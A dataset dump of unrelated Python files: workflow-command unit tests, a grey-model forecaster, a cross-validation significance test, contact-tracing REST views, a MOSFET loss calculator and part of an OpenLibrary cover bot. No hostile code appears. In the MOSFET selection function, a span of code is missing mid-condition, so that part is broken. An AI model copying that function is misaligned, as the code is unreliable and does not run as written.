slug=\"step-1\",\n last_relevant_delta_id=v1,\n params={\"url\": \"\"},\n )\n\n # Add a module, insert before the existing one, check to make sure it\n # went there and old one is after\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={\"url\": \"https://x.com\"},\n )\n )\n self.assertEqual(all_modules.count(), 2)\n added_module = all_modules.get(order=0)\n self.assertNotEqual(added_module, existing_module)\n # Test that supplied param is written\n self.assertEqual(added_module.params[\"url\"], \"https://x.com\")\n bumped_module = all_modules.get(order=1)\n self.assertEqual(bumped_module, existing_module)\n\n # undo! undo! ahhhhh everything is on fire! 
undo!\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertEqual(all_modules.count(), 1)\n self.assertEqual(all_modules.first(), existing_module)\n\n # wait no, we wanted that module\n self.run_with_async_db(commands.redo(self.workflow.id))\n self.assertEqual(all_modules.count(), 2)\n added_module = all_modules.get(order=0)\n self.assertNotEqual(added_module, existing_module)\n bumped_module = all_modules.get(order=1)\n self.assertEqual(bumped_module, existing_module)\n\n def test_add_module_default_params(self):\n workflow = Workflow.create_and_init()\n create_module_zipfile(\n \"blah\",\n spec_kwargs={\n \"parameters\": [\n {\"id_name\": \"a\", \"type\": \"string\", \"default\": \"x\"},\n {\"id_name\": \"c\", \"type\": \"checkbox\", \"name\": \"C\", \"default\": True},\n ]\n },\n )\n\n cmd = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=\"blah\",\n position=0,\n param_values={},\n )\n )\n self.assertEqual(cmd.step.params, {\"a\": \"x\", \"c\": True})\n\n def test_add_module_raise_slug_not_unique(self):\n workflow = Workflow.create_and_init()\n tab = workflow.tabs.first()\n tab.steps.create(order=0, slug=\"step-1\", module_id_name=\"x\")\n # module_id_name doesn't exist either, but we'll white-box test and\n # assume the uniqueness check comes first\n with self.assertRaisesRegex(ValueError, \"unique\"):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=tab,\n slug=\"step-1\",\n module_id_name=\"x\",\n position=0,\n param_values={},\n )\n )\n\n def test_add_module_raise_module_key_error(self):\n workflow = Workflow.create_and_init()\n with self.assertRaises(KeyError):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=\"doesnotexist\",\n position=0,\n param_values={},\n )\n )\n\n def test_add_module_validate_params(self):\n workflow = Workflow.create_and_init()\n create_module_zipfile(\n \"blah\", spec_kwargs={\"parameters\": [{\"id_name\": \"a\", \"type\": \"string\"}]}\n )\n\n with self.assertRaises(ValueError):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=workflow.id,\n tab=workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=\"blah\",\n position=0,\n param_values={\"a\": 3},\n )\n )\n\n # Try inserting at various positions to make sure the renumbering works\n # right Then undo multiple times\n def test_add_many_modules(self):\n v1 = 1\n existing_module = self.tab.steps.create(\n order=0,\n slug=\"step-1\",\n last_relevant_delta_id=1,\n params={\"url\": \"\"},\n )\n\n # beginning state: one Step\n all_modules = self.tab.live_steps\n\n # Insert at beginning\n cmd1 = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n v2 = cmd1.id\n self.assertEqual(all_modules.count(), 2)\n self.assertEqual(cmd1.step.order, 0)\n self.assertNotEqual(cmd1.step, existing_module)\n v2 = cmd1.id\n self.assertStepVersions([v2, v2])\n\n # Insert at end\n cmd2 = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-3\",\n module_id_name=self.module_zipfile.module_id,\n position=2,\n param_values={},\n )\n )\n v3 = cmd2.id\n self.assertEqual(all_modules.count(), 3)\n self.assertEqual(cmd2.step.order, 
2)\n self.assertStepVersions([v2, v2, v3])\n\n # Insert in between two modules\n cmd3 = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-4\",\n module_id_name=self.module_zipfile.module_id,\n position=2,\n param_values={},\n )\n )\n v4 = cmd3.id\n self.assertEqual(all_modules.count(), 4)\n self.assertEqual(cmd3.step.order, 2)\n self.assertStepVersions([v2, v2, v4, v4])\n\n # We should be able to go all the way back\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertStepVersions([v2, v2, v3])\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertStepVersions([v2, v2])\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertStepVersions([v1])\n self.assertEqual(\n list(all_modules.values_list(\"id\", flat=True)), [existing_module.id]\n )\n\n # Delete module, then undo, redo\n def test_delete_module(self):\n v1 = 1\n existing_module = self.tab.steps.create(\n order=0,\n slug=\"step-1\",\n last_relevant_delta_id=v1,\n params={\"url\": \"\"},\n )\n\n all_modules = self.tab.live_steps\n\n self.workflow.refresh_from_db()\n self.assertStepVersions([v1])\n\n # Delete it. Yeah, you better run.\n cmd = self.run_with_async_db(\n commands.do(\n DeleteStep,\n workflow_id=self.workflow.id,\n step=existing_module,\n )\n )\n self.assertEqual(all_modules.count(), 0)\n self.assertStepVersions([])\n\n # workflow revision should have been incremented\n self.workflow.refresh_from_db()\n v2 = cmd.id\n self.assertGreater(v2, v1)\n\n # undo\n self.run_with_async_db(commands.undo(self.workflow.id))\n self.assertEqual(all_modules.count(), 1)\n self.assertStepVersions([v1])\n self.assertEqual(all_modules.first(), existing_module)\n\n def test_delete_selected(self):\n step = self.tab.steps.create(order=0, slug=\"step-1\", params={\"url\": \"\"})\n self.tab.selected_step_position = 0\n self.tab.save(update_fields=[\"selected_step_position\"])\n\n self.run_with_async_db(\n commands.do(DeleteStep, workflow_id=self.workflow.id, step=step)\n )\n\n self.tab.refresh_from_db()\n self.assertIsNone(self.tab.selected_step_position)\n\n self.run_with_async_db(commands.undo(self.workflow.id)) # don't crash\n\n def test_undo_add_only_selected(self):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n\n self.tab.selected_step_position = 0\n self.tab.save(update_fields=[\"selected_step_position\"])\n\n self.run_with_async_db(commands.undo(self.workflow.id))\n\n self.tab.refresh_from_db()\n self.assertIsNone(self.tab.selected_step_position)\n\n # ensure that adding a module, selecting it, then undo add, prevents\n # dangling selected_step (basically the AddModule equivalent of\n # test_delete_selected)\n def test_add_undo_selected(self):\n self.tab.steps.create(order=0, slug=\"step-1\", params={\"url\": \"\"})\n\n # beginning state: one Step\n all_modules = self.tab.live_steps\n self.assertEqual(all_modules.count(), 1)\n\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=1,\n param_values={},\n )\n )\n\n self.tab.selected_step_position = 1\n self.tab.save(update_fields=[\"selected_step_position\"])\n\n self.run_with_async_db(commands.undo(self.workflow.id))\n\n self.tab.refresh_from_db()\n 
self.assertEqual(self.tab.selected_step_position, 0)\n\n def test_add_to_empty_tab_affects_dependent_tab_steps(self):\n module_zipfile = create_module_zipfile(\n \"tabby\", spec_kwargs={\"parameters\": [{\"id_name\": \"tab\", \"type\": \"tab\"}]}\n )\n\n step1 = self.workflow.tabs.first().steps.create(\n order=0,\n slug=\"step-1\",\n module_id_name=\"tabby\",\n params={\"tab\": \"tab-2\"},\n cached_migrated_params={\"tab\": \"tab-2\"},\n cached_migrated_params_module_version=module_zipfile.version,\n )\n\n tab2 = self.workflow.tabs.create(position=1, slug=\"tab-2\")\n\n # Now add a module to tab2.\n cmd = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=tab2,\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={\"url\": \"https://x.com\"},\n )\n )\n\n # Tab1's \"tabby\" module depends on tab2, so it should update.\n step1.refresh_from_db()\n self.assertEqual(step1.last_relevant_delta_id, cmd.id)\n\n # We had a bug where add then delete caused an error when deleting\n # workflow, since both commands tried to delete the Step\n def test_add_delete(self):\n cmda = self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n self.run_with_async_db(\n commands.do(\n DeleteStep,\n workflow_id=self.workflow.id,\n step=cmda.step,\n )\n )\n self.workflow.delete()\n self.assertTrue(True) # we didn't crash! Yay, we pass\n\n def test_delete_if_workflow_delete_cascaded_to_step_first(self):\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-1\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n # Add a second command -- so we test what happens when deleting\n # multiple deltas while deleting the workflow.\n self.run_with_async_db(\n commands.do(\n AddStep,\n workflow_id=self.workflow.id,\n tab=self.workflow.tabs.first(),\n slug=\"step-2\",\n module_id_name=self.module_zipfile.module_id,\n position=0,\n param_values={},\n )\n )\n self.workflow.delete()\n self.assertTrue(True) # we didn't crash! 
Yay, we pass\n","repo_name":"CJWorkbench/cjworkbench","sub_path":"cjwstate/tests/models/commands/test_step_commands.py","file_name":"test_step_commands.py","file_ext":"py","file_size_in_byte":14783,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"48"}
{"seq_id":"23253563590","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n'''\nAuthor: YeBo\nDate: 2018/4/17 14:54\nPython Version: 3.6\nFile: MFGMnF_3.py\nSoftware: PyCharm\n'''\n\nimport numpy as np\nimport math\nfrom pandas import Series\nfrom pandas import DataFrame\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n# Object-oriented implementation\n\n\nclass MFGMnF:\n\n    def __init__(self, history_data):\n        # build the data matrix B and the data vector Y\n        # history_data: historical data\n        # nn: starting n value; Python sequences are 0-based, so subtract 1 (default 0)\n\n        self.history_data = np.array(history_data)\n        self.history_data_ago = np.zeros(len(self.history_data))\n\n        self.a = 1\n        self.b = 1\n        self.x_predition = []\n        self.n_prediction = len(self.history_data) + 1\n\n    def GMn_prediction(self):\n\n\n        xx1 = np.zeros(self.n_prediction)\n        xx1[0] = self.history_data[0]  # the first value is unchanged\n        for i in range(2, self.n_prediction + 1):\n            xx1[i - 1] = (self.history_data_ago[self.nn - 1] - self.b / self.a) * math.exp(-self.a * (i - self.nn)) + self.b / self.a\n            # i - 1 because Python sequences start at index 0\n        # restore the predicted values (inverse accumulated generating operation)\n        self.x_predition = np.ones(len(xx1))\n        for i in range((len(xx1))):\n            if i == 0:\n                self.x_predition[i] = self.history_data[i]\n            else:\n                self.x_predition[i] = xx1[i] - xx1[i - 1]\n\n        # print(self.x_predition)\n\n        return self.x_predition\n\n    def GMn(self,nn, n_prediction):\n        # x0: historical data as an array\n        # x1: first-order accumulated (AGO) sequence\n        # xx1: accumulated values computed by the GM model\n        self.nn = nn\n        self.n_prediction = n_prediction\n        n = len(self.history_data)\n        self.history_data = np.array(self.history_data)\n        self.history_data_ago = np.array([sum(self.history_data[0:i + 1]) for i in range(n)])\n        B = np.zeros([n - 1, 2])\n        Y = np.zeros([n - 1, 1])\n        for i in range(0, n - 1):\n            B[i][0] = -0.5 * (self.history_data_ago[i] + self.history_data_ago[i + 1])\n            B[i][1] = 1\n            Y[i][0] = self.history_data[i + 1]\n        # solve for the parameters a and b of the GM(1,1) differential equation\n        A = np.linalg.inv(B.T.dot(B)).dot(B.T).dot(Y)\n        self.a = A[0][0]\n        self.b = A[1][0]\n\n        # run the GMn prediction\n        self.x_predition = self.GMn_prediction()\n        error = np.ones(n)\n        for i in range(n):\n            error[i] = self.history_data[i] - self.x_predition[i]\n\n        error_predict_1 = self.Fourierseries(error)\n        error_predict_2 = self.exponentialsmoothing(error, error_predict_1)\n        # print(self.x_predition[1:self.n_prediction])\n        # print(error_predict_1[0:self.n_prediction-1])\n        # print(error_predict_2[0:self.n_prediction-1])\n        x_prediction_final = np.zeros(len(self.x_predition))  # initialize the final result\n        x_prediction_final[0] = self.history_data[0]\n        error_predict_1 = np.insert(error_predict_1,0,0)\n        error_predict_2 = np.insert(error_predict_2, 0, 0)\n        x_prediction_final = self.x_predition + error_predict_1 + error_predict_2\n\n        return x_prediction_final, self.x_predition, error_predict_1, error_predict_2\n\n\n    def Fourierseries(self, error, ka=4):\n        # fit the first-order residuals with a Fourier series\n        # n: number of data points\n        # ka: total number of a & b coefficients, a multiple of 2\n        # error: residuals of the first prediction\n        n = len(self.history_data)\n        error = np.delete(error, 0)\n        T = n - 1\n        P = np.zeros([n - 1, ka + 1])\n        P[:, 0] = 1 / 2  # fill the first column\n        for i in range(2, n + 1):\n            kaa = 1\n            for j in range(1, ka, 2):  # step of 2, i.e. indices 1 3 5 7 9\n                P[i - 2, j] = math.cos(2 * math.pi * kaa / T * i)\n                P[i - 2, j + 1] = math.sin(2 * math.pi * kaa / T * i)\n                kaa += 1\n        C = np.linalg.inv(P.T.dot(P)).dot(P.T).dot(error)\n        error_predict_1 = np.ones(self.n_prediction - 1)\n        for k in range(2, self.n_prediction + 1):\n            error_predict_1[k - 2] = 0  # initialize the predicted value\n            ii = 1\n            for i in range(1, ka, 2):\n                error_predict_1[k - 2] = error_predict_1[k - 2] + C[i] * math.cos(2 * math.pi * ii / T * k) + \\\n                                         C[i + 1] * math.sin(2 * math.pi * ii / T * k)\n                ii += 1\n            error_predict_1[k - 2] += 1 / 2 * C[0]\n\n        return error_predict_1\n\n    def exponentialsmoothing(self, error, error_predict_1, alpha=0.5):\n\n\n        # single (first-order) exponential smoothing\n        # error: actual first-order residuals\n        # error_predict_1: fitted first-order residuals\n        # alpha: smoothing weight\n        error = np.delete(error, 0)  # drop the first entry of error so the series line up for comparison\n        n = len(error)\n        error_predict_1 = np.delete(error_predict_1, list(range(n,self.n_prediction-1)))  # the predicted error has one extra entry\n        error_2 = error - error_predict_1\n        error_predict_2 = np.zeros(self.n_prediction-1)\n        error_predict_2[0] = error_2[0]\n        for i in range(0, self.n_prediction-1):\n            if i == 0:\n                error_predict_2[i] = alpha * error_2[0] + (1 - alpha) * error_predict_2[0]\n            else:\n                error_predict_2[i] = alpha * error_2[i-1] + (1 - alpha) * error_predict_2[i-1]  # this step means it can only predict the next input, not several steps ahead\n\n        return error_predict_2\n\n\n\nif __name__ == '__main__':\n    history_data = [132, 92, 118, 130, 187]\n    nn = MFGMnF(history_data)\n    x_prediction_final, x_predition, error_predict_1, error_predict_2 = nn.GMn(3, 6)\n    print(x_prediction_final, '\\n', x_predition, '\\n', error_predict_1, '\\n', error_predict_2)\n\n\n    threshold = 1.0e-2\n    # x1_data = np.random.randn(100).astype(np.float32)\n    # x2_data = np.random.randn(100).astype(np.float32)\n    # x3_data = np.random.randn(100).astype(np.float32)\n    # y_data = x1_data*2 + x2_data*3 + x3_data*4 + 1.5\n\n    weight1 = tf.Variable(1.)\n    weight2 = tf.Variable(1.)\n    weight3 = tf.Variable(1.)\n    bias = tf.constant([0.])\n\n    x1_ = tf.placeholder(tf.float32)\n    x2_ = tf.placeholder(tf.float32)\n    x3_ = tf.placeholder(tf.float32)\n    y_ = tf.placeholder(tf.float32)\n\n    y_model = tf.add(tf.add(tf.multiply(x1_, weight1), tf.add(tf.multiply(x2_, weight2), tf.multiply(x3_, weight3))), bias)\n    loss = tf.reduce_mean(tf.pow((y_model - y_), 2))\n\n    train_op = tf.train.GradientDescentOptimizer(0.01).minimize(loss)\n\n    sess = tf.Session()\n    init = tf.global_variables_initializer()\n    sess.run(init)\n    flag = 1\n    while(flag):\n        for (x,y) in zip(zip(x_predition, error_predict_1, error_predict_2), x_prediction_final):\n            sess.run(train_op, feed_dict={x1_: x[0], x2_: x[1], x3_: x[2], y_: y})\n            print('weight1: ', weight1.eval(sess), 'weight2: ', weight2.eval(sess), 'weight3: ', weight3.eval(sess))\n\n            if sess.run(loss, feed_dict={x1_: x[0], x2_: x[1], x3_: x[2], y_: y}) <= threshold:\n                flag = 0\n\n    print('weight1: ', weight1.eval(sess), 'weight2: ', weight2.eval(sess), 'weight3: ', weight3.eval(sess))\n\n\n    #\n    # threshold = 1.0e-2\n    # x1_data = np.random.randn(100).astype(np.float32)\n    # x2_data = np.random.randn(100).astype(np.float32)\n    #\n    # y_data = x1_data*2 + x2_data*3 + 1.5\n    #\n    # weight1 = tf.Variable(1.)\n    # weight2 = tf.Variable(1.)\n    #\n    # bias = tf.Variable(1.)\n    #\n    # x1_ = tf.placeholder(tf.float32)\n    # x2_ = tf.placeholder(tf.float32)\n    #\n    # y_ = tf.placeholder(tf.float32)\n    #\n    # y_model = tf.add(tf.add(tf.multiply(x1_, weight1), tf.multiply(x2_, weight2)), bias)\n    # loss = tf.reduce_mean(tf.pow((y_model - y_), 2))\n    #\n    # train_op = tf.train.GradientDescentOptimizer(0.01).minimize(loss)\n    #\n    # sess = tf.Session()\n    # init = tf.global_variables_initializer()\n    # sess.run(init)\n    # flag = 1\n    # while(flag):\n    #     for (x,y) in zip(zip(x1_data, x2_data), y_data):\n    #         sess.run(train_op, feed_dict={x1_: x[0], x2_: x[1], y_: y})\n    #         if sess.run(loss, feed_dict={x1_: x[1], y_: y}) <= threshold:\n    #             flag = 0\n    #\n    # print('weight1: ', weight1.eval(sess), 'weight2: ', weight2.eval(sess),'bias: ', bias.eval(sess))\n\n\n\n\n","repo_name":"YeBo0807/GM","sub_path":"MFGMnF_3.py","file_name":"MFGMnF_3.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8030011623","text":"\r\n\r\n# =============================================================================\r\n# #5x2 CV Significance test\r\n# =============================================================================\r\n\r\n# imports\r\nimport numpy as np\r\nimport numpy.random as rd\r\nimport pandas as pd\r\nfrom scipy.stats import t\r\n\r\n\r\ndef test(scores1, scores2):\r\n    # transform to array\r\n    s1, s2 = np.array(scores1), np.array(scores2)\r\n    diff = s1-s2\r\n    # difference of first fold in first iteration\r\n    p_1_1 = diff[0] \r\n    # calculate the mean for each of the 5 folds = 5 means\r\n    p_bar = [((diff[i] + diff[i+1])/2) for i in range(0, 9, 2)] \r\n    # compute the variance estimate of each fold = 5 variances\r\n    p_sig = [(np.power((diff[i] - p_bar[t]), 2) + np.power((diff[i+1] - p_bar[t]), 2)) for i, t in zip(range(0, 9, 2), range(5))]\r\n    # calculate the mean of the variances\r\n    sigm = np.mean(np.array(p_sig))\r\n    # compute the t-value as proposed by Dietterich\r\n    t_val = p_1_1 / np.sqrt(sigm)\r\n    p_val = 2*(t.cdf(-abs(t_val), 5))\r\n    # keep only the p-value\r\n    data = p_val # pd.DataFrame([[t_val], [p_val]], columns=[name12])\r\n    # return the two-sided p-value\r\n    return data\r\n\r\n\r\ndef pTable(fitTlist):\r\n    # create names\r\n    r_names = ['Rand', 'CTB', 'CTPB', 'DEGL']\r\n    c_names = ['MERGE', 'DEGL', 'CTPB', 'CTB']\r\n    # create dataframe\r\n    data = pd.DataFrame(columns=c_names, index=r_names)\r\n    # create combinations\r\n    comb = [(0, 4), (0, 3), (0, 2), (0, 1), (1, 4), (1, 3), (1, 2), (2, 4), (2, 3), (3, 4)]\r\n    # fill dataframe\r\n    for co in comb:\r\n        x, y = co\r\n        s1, s2 = fitTlist[x], fitTlist[y]\r\n        p_val = test(s1, s2)\r\n        data.iloc[x, np.abs(y-4)] = p_val\r\n    # return table\r\n    return data \r\n    \r\n    \r\ndef summary(fitList):\r\n    # create names\r\n    r_names = ['RAND', 'CTB', 'CTPB', 'DEGL', 'MERGE'] \r\n    c_names = ['Best', 'Median', 'Worst', 'Mean', 'SD'] \r\n    # create dataframe\r\n    data = pd.DataFrame(columns=c_names, index=r_names) \r\n    for i in range(5):\r\n        fit = fitList[i]\r\n        data.iloc[i, 0] = np.min(fit)\r\n        data.iloc[i, 1] = np.median(fit)\r\n        data.iloc[i, 2] = np.max(fit)\r\n        data.iloc[i, 3] = np.mean(fit)\r\n        data.iloc[i, 4] = np.std(fit)\r\n    # return dataframe\r\n    return data\r\n    \r\n    \r\n    \r\n    \r\n\r\n\r\n","repo_name":"unibasPP/Optimizing-Autoencoders-For-Dimensionality-Reduction-An-Evolutionary-Approach","sub_path":"Experiments/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73158407184","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import Profile, Interaction\nfrom .serializers import UserSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass UserRecordView(APIView):\n    \"\"\"\n    API View to create or get a list of all the registered\n    users. 
GET request returns the registered users whereas\n a POST request allows to create a new user.\n \"\"\"\n permission_classes = [AllowAny]\n\n def post(self, request):\n serializer = UserSerializer(data=request.data)\n email = request.data['email']\n query = User.objects.filter(email=email)\n print(query)\n if serializer.is_valid() and len(query) == 0:\n serializer.create(validated_data=request.data)\n return Response(\n serializer.data,\n status=status.HTTP_201_CREATED\n )\n return Response(\n {\n \"error\": True,\n \"error_msg\": serializer.error_messages,\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n\nfrom datetime import datetime\nclass StatusView(APIView):\n \"\"\"\n API View to get or update current status of a user.\n GET request returns the status of a user and if there is an emergency.\n POST request updates whether user is infected, if there is an emergency\n as well as loading new interactions into the database\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n profile = Profile.objects.filter(user=user)[0]\n contact = profile.contact \n unconfirmed_contact = profile.unconfirmed_contact \n profile.contact = False\n profile.unconfirmed_contact = False\n profile.save()\n\n count_confirmed, count_unconfirmed, count_interactions = profile.statistics()\n\n print(\"they are {} ,{}, {}\".format(count_confirmed, count_unconfirmed, count_interactions ))\n return Response(\n {\n \"contact\": contact,\n \"unconfirmed_contact\": unconfirmed_contact,\n \"identifier\": profile.identifier,\n \"count_confirmed\": count_confirmed,\n \"count_unconfirmed\": count_unconfirmed,\n \"total_interactions\": count_interactions,\n },\n status=status.HTTP_200_OK\n )\n def post(self, request):\n user = request.user\n profile = Profile.objects.filter(user=user)[0]\n data = request.data\n keys = list(data)\n print(\"data\\n\"+str(data))\n print(\"keys\\n\"+str(keys))\n if keys == []:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n \"\"\"\n if 'set_identifier' in keys:\n profile.identifier = data['set_identifier']\n profile.save()\n \"\"\"\n if 'infected' in keys and data['infected'] == 'true':\n # set user as infected\n # user can only set themselves as positive\n profile.set_infected()\n # go through all interactions and check for contact with infected\n profile.infection_check()\n if 'unconfirmed_infected' in keys and data['unconfirmed_infected'] == 'true':\n profile.set_unconfirmed_infected()\n profile.unconfirmed_infection_check()\n if 'interactions' in keys:\n # create or update interactions in database\n\n print(\"data is \"+str(data['interactions']))\n print(\"datalist is \"+str(data.lists()))\n\n for contact in data.getlist('interactions'):\n # find user by uuid\n print(\"contact is \" + contact)\n print('-')\n query = Profile.objects.filter(identifier=contact)\n # todo check for earlier interactions instead of creating new ones\n user1 = user\n profile1 = profile\n if len(query) == 0:\n continue\n user2 = query[0].user\n profile2 = Profile.objects.filter(user=user2)[0]\n # first interaction between users\n if profile2.infected:\n profile1.set_contact()\n if profile1.infected:\n profile2.set_contact()\n \n # look for earlier interaction between users\n inter_query1 = Interaction.objects.filter(user1=user1, user2=user2)\n inter_query2 = Interaction.objects.filter(user1=user2, user2=user1)\n if len(inter_query1) == 1:\n inter = inter_query1[0]\n #inter.set_date(date=contact['date'])\n inter.set_date()\n elif len(inter_query2) == 1:\n inter = 
inter_query2[0]\n #inter.set_date(date=contact['date'])\n inter.set_date()\n else: \n # first time interacting, create new entry\n inter = Interaction.objects.create(user1=user, user2=user2)\n inter.set_date()\n \n\n return Response(status=status.HTTP_202_ACCEPTED)\n\n","repo_name":"Lemnver/softdev_contact_tracing","sub_path":"server/enviroment/ctrace/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70568060626","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# get_ipython().run_line_magic('matplotlib', 'inline')\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.patches as patches\nsns.set(style=\"darkgrid\")\n\n\n\n\n#validated\ndef Rdson_temp(Rdson_25,Rdson_125,Tj):\n alpha=((Rdson_125/Rdson_25)**(1/100)-1)*100\n Rdson_Tj=Rdson_25*(1+alpha/100)**(Tj-25)\n return Rdson_Tj\n\n\n\n#validated\ndef Coss_sw_losses(Coss,Vds,fsw):\n return Coss*Vds**2*fsw/2\n\n\n\n\n#validated\ndef gate_sw_losses(Qg,Vdr,fsw):\n return Qg*Vdr*fsw\n\n\n# In[5]:\n\n\n#validated\ndef sw_losses(Vds,Ids,fsw,Qg,Idr):\n#based on fairchild application note\n return Vds*Ids/2*fsw*Qg/Idr\n\n\n# In[6]:\n\n\n#validated\ndef cond_losses(Rdson,Irms):\n return Rdson*Irms**2\n\n\n# In[7]:\n\n\n#validated\ndef Id_max_T(Id_max_25,Id_max_100,Tj):\n return Id_max_25+(Id_max_100-Id_max_25)/(100-25)*(Tj-25)\n\n\n# In[8]:\n\n\n# MOSFET data\nMOSFETs=pd.read_excel(r'.\\Space Components.xls',sheet_name=\"MOSFETs\")\nMOSFETs.tail()\n\n\n# In[58]:\n\n\n#Validated\n\ndef opt_MOSFET(Vds,Id,Irms,ZVS,ZCS,Vds_sw_on,Vds_sw_off,Ids_sw_on,Ids_sw_off,Vdr,Idr,fsw,To):\n Pmos_opt=100000\n sel=666\n for i in MOSFETs.index:\n\n #For consistency with MathCad, which uses end as closing indentifier. 
Not necessary in Python\n # and used to avoid an error.\n if (MOSFETs['Part'][i]==\"end\"):\n break\n if (MOSFETs['Coss (pF)'][i]==\"NP\" or MOSFETs['Qg (nC)'][i]==\"NP\" or MOSFETs['Rth jc (oC/W)'][i]==\"NP\"):\n continue\n Coss=MOSFETs['Coss (pF)'][i]*10**-12\n Qg=MOSFETs['Qg (nC)'][i]*10**-9\n\n if (MOSFETs['Vds (V)'][i]Tj+0.1):\n Tj=Tj+0.1\n Rdson=Rdson_temp(MOSFETs['Rdson (ohms @25oC)'][i],MOSFETs['Rdson (ohms @125oC)'][i],Tj)\n Pmos_cond=cond_losses(Rdson,Irms)\n Pmos_tot=Pmos_cond+Pmos_sw+Pmos_gate+Pmos_coss\n Tj_end=To+Pmos_tot*MOSFETs['Rth jc (oC/W)'][i]\n if (Tj_end>MOSFETs['Tj_max (oC)'][i]):\n break\n\n if (Tj_end>MOSFETs['Tj_max (oC)'][i]):\n continue\n\n if ((Id_max_T(MOSFETs['Id (A @25oC)'][i],MOSFETs['Id (A @100oC)'][i],Tj_end) OpenLibrary:\n return OpenLibrary(\n credentials=config.Credentials(\n access=os.environ[\"OL_ACCESS_KEY\"], secret=os.environ[\"OL_SECRET_KEY\"]\n )\n )\n\n\nclass EditionCoverData(SQLModel, table=True):\n isbn_13: str = Field(default=None, primary_key=True)\n cover_exists: bool = Field(default=False)\n\n\nengine = create_engine(\"sqlite:///bwb-cover-bot.sqlite\", echo=False)\nSQLModel.metadata.create_all(engine)\ndb_session = Session(engine)\n\n\ndef update_cover_for_edition(\n edition_olid: str,\n file_name: str,\n cover_data: bytes,\n mime_type: str,\n ol: OpenLibrary,\n) -> bool:\n form_data_body = {\n \"file\": (file_name, cover_data, mime_type),\n \"url\": (None, \"https://\"),\n \"upload\": (None, \"Submit\"),\n }\n resp = ol.session.post(\n f\"https://openlibrary.org/books/{edition_olid}/-/add-cover\",\n files=form_data_body,\n )\n is_update_success: bool = resp.ok and \"Saved!\" in resp.text\n return is_update_success\n\n\ndef is_cover_already_stored(isbn_13: str) -> bool:\n statement = select(EditionCoverData).where(EditionCoverData.isbn_13 == isbn_13)\n edition_cover_data = db_session.execute(statement).first()\n return (\n len(edition_cover_data or []) == 1\n and edition_cover_data[0].cover_exists is True\n )\n\n\ndef verify_and_update_cover(\n isbn_13: str, archive_contents: ZipFile, ol: OpenLibrary\n) -> bool:\n if is_cover_already_stored(isbn_13):\n logging.info(f\"cover exists in dump for {isbn_13}\")\n return False\n\n ol_edition = ol.Edition.get(isbn=isbn_13)\n if not ol_edition:\n return False\n\n edition_olid = ol_edition.olid\n cover_exists = getattr(ol_edition, \"covers\", None)\n if cover_exists:\n db_session.bulk_save_objects(\n [EditionCoverData(isbn_13=isbn_13, cover_exists=True)]\n )\n db_session.commit()\n logging.info(f\"cover exists in OL for {isbn_13}\")\n return False\n\n is_success = update_cover_for_edition(\n edition_olid=edition_olid,\n cover_data=archive_contents.read(f\"{isbn_13}.jpg\"),\n file_name=f\"{isbn_13}.jpg\",\n mime_type=\"image/jpeg\",\n ol=ol,\n )\n\n 